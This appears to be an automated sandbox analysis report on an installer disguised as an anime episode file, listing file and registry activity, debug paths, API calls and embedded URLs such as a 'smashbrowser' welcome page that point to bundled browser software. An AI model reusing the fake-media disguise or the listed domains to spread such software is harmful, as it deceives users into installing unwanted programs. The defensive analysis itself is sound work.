Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\3082\license.rtf
Creates a software uninstall entry
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF4C347D-954E-4543-88D2-EC17F07F466F}
Creates a directory in C:\Program Files
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDirectory created: C:\Program Files\InstallerJump to behavior
PE / OLE file has a valid certificate
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Binary contains paths to debug symbols
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: VC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFCM140U.amd64.pdb source: mfcm140u.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdb source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb source: mfc140deu.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb source: mfc140enu.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdb source: concrt140.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb%% source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdbGCTL source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: wixstdba.dll.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdb source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdb source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb source: mfc140jpn.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdbGCTL source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdbGCTL source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdbGCTL source: concrt140.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00013BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,4_2_00013BC3
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00054315 FindFirstFileW,FindClose,4_2_00054315
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0002993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,4_2_0002993E
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00047A87 FindFirstFileExW,4_2_00047A87
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000F4315 FindFirstFileW,FindClose,5_2_000F4315
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,5_2_000C993E
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,5_2_000B3BC3
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E7A87 FindFirstFileExW,5_2_000E7A87
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cabJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULLJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULLJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64Jump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packagesJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULLJump to behavior
Source: VC_redist.x64.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: VC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.drString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsps.ssl.com0
Source: VC_redist.x64.exe, 0000001C.00000003.364850644.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, VC_redist.x64.exe, 0000001C.00000003.365160612.0000000003390000.00000004.00000020.00020000.00000000.sdmp, thm.xml.20.dr, thm.xml.18.drString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: VC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010d=
Source: VC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010le
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Boku no Hero Academia 6th Season - Episode 13.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.250432231.0000000003500000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000002.00000003.410317140.0000000002304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com1R
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com1RO
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com2
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.comiR
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.comiRO
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407001467.00000000024E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php(
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php2
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409374574.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php8
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php:
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php=
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407404878.00000000024ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpA
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409693542.0000000003920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpC:
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpJ6
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpR
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409391670.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpVH
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpb
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpeewi
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpl
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phplW7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409410186.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpoft
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpv7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409410186.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpwEI
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php~6s
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409029766.0000000000A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com;4
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drString found in binary or memory: https://www.innosetup.com/
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drString found in binary or memory: https://www.remobjects.com/ps
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: https://www.ssl.com/repository0
Source: unknownDNS traffic detected: queries for: accounts.google.com
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeFile deleted: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3cd703.msiJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003C0FA4_2_0003C0FA
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000161844_2_00016184
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004022D4_2_0004022D
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004A3B04_2_0004A3B0
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000406624_2_00040662
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0001A7EF4_2_0001A7EF
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004A85E4_2_0004A85E
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003F9194_2_0003F919
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000269CC4_2_000269CC
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00040A974_2_00040A97
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00042B214_2_00042B21
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004ED4C4_2_0004ED4C
